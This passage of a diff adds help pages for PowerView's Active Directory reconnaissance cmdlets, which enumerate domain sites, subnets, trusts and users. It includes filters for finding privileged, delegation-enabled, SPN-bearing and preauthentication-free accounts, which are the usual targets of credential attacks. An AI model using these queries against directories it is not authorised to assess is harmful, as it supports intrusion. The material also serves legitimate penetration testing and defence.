+## OUTPUTS
+
+### PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainSite.md b/docs/Recon/Get-DomainSite.md new file mode 100755 index 0000000..caf7790 --- /dev/null +++ b/docs/Recon/Get-DomainSite.md @@ -0,0 +1,309 @@ +# Get-DomainSite
+
+## SYNOPSIS
+Search for all sites or specific site objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainSite [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties whencreated,usnchanged,...".
+By default, all site objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSite
+```
+
+Returns the current sites in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainSite *admin* -Domain testlab.local
+```
+
+Returns all sites with "admin" in their name in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+```
+
+Returns all sites with linked to the specified group policy object.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSite -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+An site name (e.g.
+Test-Site), DistinguishedName (e.g.
+CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or
+GUID (e.g.
+c37726ef-2b64-4524-b85b-6a9700c234dd).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -GPLink
+Only return sites with the specified GUID in their gplink property.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: GUID
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Site
+
+Custom PSObject with translated site property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainSubnet.md b/docs/Recon/Get-DomainSubnet.md new file mode 100755 index 0000000..8cd82b1 --- /dev/null +++ b/docs/Recon/Get-DomainSubnet.md @@ -0,0 +1,309 @@ +# Get-DomainSubnet
+
+## SYNOPSIS
+Search for all subnets or specific subnets objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainSubnet [[-Identity] <String[]>] [-SiteName <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties whencreated,usnchanged,...".
+By default, all subnet objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSubnet
+```
+
+Returns the current subnets in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainSubnet *admin* -Domain testlab.local
+```
+
+Returns all subnets with "admin" in their name in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+```
+
+Returns all subnets with linked to the specified group policy object.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSubnet -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+An subnet name (e.g.
+'192.168.50.0/24'), DistinguishedName (e.g.
+'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),
+or GUID (e.g.
+c37726ef-2b64-4524-b85b-6a9700c234dd).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SiteName
+Only return subnets from the specified SiteName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Subnet
+
+Custom PSObject with translated subnet property fields.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainTrust.md b/docs/Recon/Get-DomainTrust.md new file mode 100755 index 0000000..29af577 --- /dev/null +++ b/docs/Recon/Get-DomainTrust.md @@ -0,0 +1,250 @@ +# Get-DomainTrust
+
+## SYNOPSIS
+{{Fill in the Synopsis}}
+
+## SYNTAX
+
+### NET (Default)
+```
+Get-DomainTrust [[-Domain] <String>] [-FindOne]
+```
+
+### API
+```
+Get-DomainTrust [[-Domain] <String>] [-API] [-Server <String>] [-FindOne]
+```
+
+### LDAP
+```
+Get-DomainTrust [[-Domain] <String>] [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### Example 1
+```
+PS C:\> {{ Add example code here }}
+```
+
+{{ Add example description here }}
+
+## PARAMETERS
+
+### -API
+{{Fill API Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: API
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+{{Fill Credential Description}}
+
+```yaml
+Type: PSCredential
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+{{Fill Domain Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 0
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -FindOne
+{{Fill FindOne Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAP
+{{Fill LDAP Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+{{Fill LDAPFilter Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+{{Fill Properties Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+{{Fill ResultPageSize Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+{{Fill SearchScope Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases:
+Accepted values: Base, OneLevel, Subtree
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+{{Fill Server Description}}
+
+```yaml
+Type: String
+Parameter Sets: API, LDAP
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+{{Fill ServerTimeLimit Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+{{Fill Tombstone Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### System.String
+
+
+## OUTPUTS
+
+### PowerView.DomainTrust.NET
+PowerView.DomainTrust.LDAP
+PowerView.DomainTrust.API
+
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainTrustMapping.md b/docs/Recon/Get-DomainTrustMapping.md new file mode 100755 index 0000000..692f265 --- /dev/null +++ b/docs/Recon/Get-DomainTrustMapping.md @@ -0,0 +1,220 @@ +# Get-DomainTrustMapping
+
+## SYNOPSIS
+{{Fill in the Synopsis}}
+
+## SYNTAX
+
+### NET (Default)
+```
+Get-DomainTrustMapping
+```
+
+### API
+```
+Get-DomainTrustMapping [-API] [-Server <String>]
+```
+
+### LDAP
+```
+Get-DomainTrustMapping [-LDAP] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>]
+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### Example 1
+```
+PS C:\> {{ Add example code here }}
+```
+
+{{ Add example description here }}
+
+## PARAMETERS
+
+### -API
+{{Fill API Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: API
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+{{Fill Credential Description}}
+
+```yaml
+Type: PSCredential
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAP
+{{Fill LDAP Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+{{Fill LDAPFilter Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+{{Fill Properties Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+{{Fill ResultPageSize Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+{{Fill SearchBase Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+{{Fill SearchScope Description}}
+
+```yaml
+Type: String
+Parameter Sets: LDAP
+Aliases:
+Accepted values: Base, OneLevel, Subtree
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+{{Fill Server Description}}
+
+```yaml
+Type: String
+Parameter Sets: API, LDAP
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+{{Fill ServerTimeLimit Description}}
+
+```yaml
+Type: Int32
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+{{Fill Tombstone Description}}
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: LDAP
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### None
+
+
+## OUTPUTS
+
+### PowerView.DomainTrust.NET
+PowerView.DomainTrust.LDAP
+PowerView.DomainTrust.API
+
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainUser.md b/docs/Recon/Get-DomainUser.md new file mode 100755 index 0000000..7247a1d --- /dev/null +++ b/docs/Recon/Get-DomainUser.md @@ -0,0 +1,426 @@ +# Get-DomainUser
+
+## SYNOPSIS
+Return all users or specific user objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty
+
+## SYNTAX
+
+### AllowDelegation (Default)
+```
+Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-AllowDelegation] [-KerberosPreuthNotRequired]
+ [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+### DisallowDelegation
+```
+Get-DomainUser [[-Identity] <String[]>] [-SPN] [-AdminCount] [-DisallowDelegation] [-KerberosPreuthNotRequired]
+ [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all user objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainUser -Domain testlab.local
+```
+
+Return all users for the testlab.local domain
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator"
+```
+
+Return the user with the given SID, as well as Administrator.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
+```
+
+lastlogoff samaccountname
+---------- --------------
+12/31/1600 4:00:00 PM dfm.a
+12/31/1600 4:00:00 PM dfm
+12/31/1600 4:00:00 PM harmj0y
+12/31/1600 4:00:00 PM Administrator
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation
+```
+
+Search the specified OU for privileged user (AdminCount = 1) that allow delegation
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+```
+
+Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon
+
+### -------------------------- EXAMPLE 6 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUser -Credential $Cred
+
+### -------------------------- EXAMPLE 7 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+Get-DomainUser dev\user1 -Verbose -Properties distinguishedname
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainUser\] filter string: (&(samAccountType=805306368)(|(samAccountName=user1)))
+
+distinguishedname
+-----------------
+CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+Also accepts DOMAIN\user format.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SPN
+Switch.
+Only return user objects with non-null service principal names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AdminCount
+Switch.
+Return users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AllowDelegation
+Switch.
+Return user accounts that are not marked as 'sensitive and not allowed for delegation'
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: AllowDelegation
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DisallowDelegation
+Switch.
+Return user accounts that are marked as 'sensitive and not allowed for delegation'
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: DisallowDelegation
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -KerberosPreuthNotRequired
+Switch.
+Return user accounts with "Do not require Kerberos preauthentication" set.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
